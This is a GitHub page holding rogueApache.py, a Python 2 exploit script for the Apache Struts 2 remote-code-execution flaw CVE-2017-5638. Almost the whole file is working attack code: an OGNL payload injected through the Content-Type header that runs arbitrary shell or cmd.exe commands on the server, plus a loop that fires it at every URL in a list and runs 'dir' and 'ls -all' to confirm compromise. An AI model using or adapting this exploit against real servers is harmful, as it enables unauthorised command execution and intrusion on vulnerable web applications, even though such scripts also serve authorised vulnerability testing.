-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathrogueApache.py
More file actions
72 lines (64 loc) · 2.59 KB
/
rogueApache.py
File metadata and controls
72 lines (64 loc) · 2.59 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# CVE-2017-5638
#
# Apache Struts 2.0 RCE vulnerability
#
# A script to exploit CVE-2017-5638 - It allows an attacker to inject OS commands
# into a web application through the content-type header
#
# Author: Harish Tiwari
# Email: harish@payatu.com
# Website: http://www.payatu.com
# Copyright (c) 2017-2027
# License: GPL V3
# create a file urls.txt in the same directory that should contain all the urls to be tested
#! /usr/bin/python -tt
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
request = urllib2.Request(url, headers=headers)
page = urllib2.urlopen(request).read()
except Exception, e:
page = e
return page
def main():
with open("urls.txt") as f:
content = f.readlines()
content = [x.strip() for x in content]
for ele in content:
output = exploit(str(ele), "dir")
print "[*] Testing url : "+ ele + "\n"
if "/bin/bash: dir: command not found" in output:
print ":Linux System:\n"
output = exploit(str(ele), "ls -all")
items = output.split()
if items[0] == "total":
print "[+] url " + str(ele) + " is vulnerable\n"
elif "Volume Serial Number is" in output:
print ":Windows System:\n"
print "[+] url " + str(ele) + " is vulnerable\n"
else:
output = exploit(str(ele), "dir --version")
if "This is free software: you are free to change and redistribute it" in output:
print ":Linux System Supporting dir utility:\n"
print "[+] url " + str(ele) + " is vulnerable\n"
if __name__ == "__main__":
main()